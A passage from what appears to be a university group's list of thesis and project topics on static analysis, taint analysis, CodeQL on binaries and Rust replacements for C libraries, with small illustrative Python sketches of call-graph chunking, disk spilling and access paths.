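            raise ValueError(f"SCC {sorted(scc)} needs {size} > {n} characters")
        if used + size > n and current:
            chunks.append(current)
            current, used = [], 0
        current.extend(sorted(scc))
        used += size
    if current:
        chunks.append(current)
    return chunks


graph = {"main": ["parse", "eval"], "parse": ["expr"], "expr": ["term"],
         "term": ["expr"], "eval": []}
sizes = {"main": 300, "parse": 200, "expr": 400, "term": 300, "eval": 500}
print(chunk(graph, sizes, n=1000))  # [['expr', 'term', 'parse'], ['eval', 'main']]
```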

    Prerequisites

    • Basic principles of Software Engineering
    • Experience with the C programming language
    • Lecture "Program Analysis for Security" or "Compiler-Design"
  • Project
    CI-Pipeline for a binary patching tool

    We are looking for a student to help develop a continuous integration (CI) pipeline for a binary patching tool. The project involves automating the build, test, and deployment processes to ensure reliability and efficiency.

    Prerequisites

    Strong Python skills; comfortable with Bash scripting on Linux.

  • BSc
    Finding Safe Rust Replacements for C Libraries

    Application: Please write an email describing your relevant experiences and attach a CV, your transcript of records (incl. bachelor grades), and a writing sample

    Motivation

    • Rust is a modern programming language that offers strong performance together with improved security. However, rewriting existing code bases is too expensive.
    • To enable widespread reuse of existing Rust libraries, we want to build an index of Rust libraries from https://crates.io/ that can act as replacements for widely used C libraries, e.g., the image library as a replacement for libpng
    • This way, all C applications that depend on libpng might be made a little safer by swapping out libpng for Rust's "image" library

    Your Part

    • Use a combination of LLMs and deterministic methods to implement a search for potential Rust replacements for a given C library.
    • By iterating this search over multiple popular C libraries, build an index of potential Rust replacements
    • If possible, not only search for functionally equivalent Rust libraries but also assess other properties that would simplify the developers' work during replacement, e.g., potential API compatibility, build system compatibility, and the risk of including unstable third-party dependencies (see: https://tweedegolf.nl/en/blog/119/sudo-rs-depencencies-when-less-is-better)
    • As a case study, take an example C application and one of its libraries with an adequate Rust replacement and evaluate the results for equivalence and performance.
  • BSc/Project
    Disk-Assisted Vulnerability Scanning

    Motivation When designing static vulnerability scanners, the goal is to minimize false positives while still identifying non-trivial data flows and scaling to real-world apps. IFDS-based algorithms have proven to be very useful, but they can still require hundreds of gigabytes of RAM to analyze particularly complex apps. To run the analysis in more resource-constrained settings such as developer workstations, researchers have proposed swapping less frequently used data out to disk.
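    The core idea can be sketched as a bounded in-memory store that spills the least recently used entries to disk and reloads them on access. The sketch below uses Python's `shelve` module as the "disk" and a fixed entry budget instead of a memory budget. Both are simplifying assumptions, and the eviction policy in the related work may differ.

```python
import os
import shelve
import tempfile
from collections import OrderedDict


class SpillingStore:
    """Keeps at most `capacity` entries in memory; evicts LRU entries to a shelve file."""

    def __init__(self, path: str, capacity: int):
        self.capacity = capacity
        self.memory: OrderedDict = OrderedDict()
        self.disk = shelve.open(path)
        self.spills = 0

    def put(self, key: str, value) -> None:
        self.memory[key] = value
        self.memory.move_to_end(key)  # mark as most recently used
        self._evict()

    def get(self, key: str):
        if key in self.memory:
            self.memory.move_to_end(key)
            return self.memory[key]
        value = self.disk.pop(key)  # reload from disk; KeyError if unknown
        self.put(key, value)
        return value

    def _evict(self) -> None:
        while len(self.memory) > self.capacity:
            key, value = self.memory.popitem(last=False)  # least recently used
            self.disk[key] = value
            self.spills += 1

    def close(self) -> None:
        self.disk.close()


with tempfile.TemporaryDirectory() as tmp:
    store = SpillingStore(os.path.join(tmp, "facts"), capacity=2)
    for key in "abc":
        store.put(key, {key})        # "a" is spilled when "c" arrives
    print(store.get("a"), store.spills)  # reloading "a" spills "b"
    store.close()
```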

    Your Part The research group behind this approach is notorious for providing non-reusable artifacts, i.e., only publishing binary blobs. We want to make an open-source implementation available. If done as a bachelor's thesis, you will additionally evaluate your implementation empirically and think about further improvements.

    Prerequisites You will be implementing the solution on top of a large Java codebase, so proficiency in Java is beneficial.

    Related Work Scaling Up the IFDS Algorithm with Efficient Disk-Assisted Computing

  • MSc
    Searching for vulnerabilities in Java/Android binaries with CodeQL

    Motivation CodeQL by GitHub is the industry-leading semantic code analysis engine, which allows you to query your code as if it were a database. This can be extremely useful for finding security vulnerabilities in real-world code, and the standard library already contains queries for the typical security vulnerabilities. However, the main limitation is that you need (compilable) source code of the application to build the database; therefore, out of the box, CodeQL cannot be used to scan third-party applications or dependencies for which no source code is available.
    Currently, the only way to analyze binaries with CodeQL is to use a decompiler and hope that the output is compilable.

    Your Part CodeQL builds its database representation from the AST, and this representation is a middle ground between the AST and bytecode. Our goal is to translate Java and Android binaries to the CodeQL representation without requiring a full-blown decompiler.

    During the thesis, you will deep-dive into Java/Android decompilation techniques and build your own decompiler that is able to decompile Java and/or Android binaries into CodeQL's representation. You will also learn a bit of reverse engineering, because most of the inner workings of CodeQL are not documented.

    Prerequisites A small prototype exists to prove the feasibility of this topic, which is written in Rust. It's up to you whether you want to build upon it or start from scratch.

  • MSc
    Lifting Cooperative Taint Analysis

    Motivation Taint analysis is a fundamental dataflow problem that can be used to identify security vulnerabilities such as SQL injections, XSS, insecure deserialization, and many others. To be useful and not overwhelm the user with false positives, state-of-the-art tools use precise heap abstractions such as access graphs or access paths. You can think of an access path as a variable in the code followed by a chain of at most k field references (e.g., x.f.g for k = 2). These heap abstractions are additionally enriched with type information and other metadata.
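    To make the access-path abstraction concrete, the sketch below assumes a k-limit of 2. It follows the common convention of truncating longer paths and marking them as "this prefix and anything reachable beyond it" (written `x.f.g.*`). Type information and other metadata are omitted, and the class is a hypothetical illustration rather than FlowDroid's data structure.

```python
from dataclasses import dataclass

K = 2  # maximum number of field references (assumption for illustration)


@dataclass(frozen=True)
class AccessPath:
    base: str                       # variable the path starts from
    fields: tuple[str, ...] = ()    # chain of field references
    truncated: bool = False         # True if fields beyond K were cut off

    def append(self, field: str) -> "AccessPath":
        """Model a field dereference, k-limiting the result."""
        if self.truncated:
            return self  # x.f.g.* already over-approximates longer paths
        fields = self.fields + (field,)
        if len(fields) > K:
            return AccessPath(self.base, fields[:K], truncated=True)
        return AccessPath(self.base, fields)

    def __str__(self) -> str:
        s = ".".join((self.base,) + self.fields)
        return s + ".*" if self.truncated else s


p = AccessPath("x").append("f").append("g").append("h")
print(p)  # x.f.g.*
```

    Because instances are frozen (hashable), they can serve directly as dataflow facts in sets. This is also why the access path domain D, and with it the O(|E| |D|^3) bound, grows so quickly.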
    One algorithm to solve these dataflow problems is IFDS. In particular, its ability to solve two dependent problems in cooperation, i.e., resolving aliases on demand for the taint analysis, allows IFDS-based taint analysis to discover non-trivial dataflows while still being reasonably precise. However, IFDS has a worst-case complexity of O(|E| |D|^3), where E is the set of edges in the supergraph and D is the dataflow domain. The access path domain can grow quite large, making it impossible to analyze complex applications in a reasonable timeframe.
    IDE is a generalization of IFDS, originally developed to solve problems over map domains such as constant propagation (Var -> Value), and allows splitting a powerset domain into a dataflow domain and a value domain. The time complexity of IDE is the same as for IFDS.
    A recent paper (Oct 2024) shows that it is possible to split the access path heap model into a dataflow domain of local variables and a value domain of field (de-)references, leading to an average speedup of 200x(!) compared to the equivalent IFDS formulation. Apart from basing their work on an artifact from 2016 and not publishing their code, the authors also consider alias analysis orthogonal to the taint analysis problem. To resolve aliases, they use a previously published alias analysis that still operates on an expensive access graph domain.

    Your Part First, we want to reproduce the work based on an up-to-date version of Soot and FlowDroid, because we are highly interested in open-sourcing the more scalable analysis. Second, we have the idea of a cooperative alias analysis in IDE. IDE's phase 1 is essentially IFDS, so we think it is possible to exchange dataflow facts in phase 1. Also, FlowDroid's call-site matching during the path-building stage has already shown that a context-free language can be solved across different analysis directions. Thus, the research question is whether it is possible to extend the CFL grammar (a.k.a. the value domain) to also solve aliases on demand and asynchronously with multiple IDE solvers, as is done with IFDS. To the best of our knowledge, no paper yet uses multiple IDE solvers in cooperation, so this is something completely new to work on!

    Prerequisites

    • You will be implementing the solution on top of a large Java codebase, so proficiency in Java is beneficial.
    • Furthermore, this topic requires you to design a complex static analysis that is supposed to analyze real-world Java applications, which requires good knowledge about the Java language semantics.
    • Knowledge about static analysis and context-free languages obtained from courses like Principles of Compiler Design or Program Analysis for Security is also beneficial.

    Related Work

In Progress



Last update 02.04.2025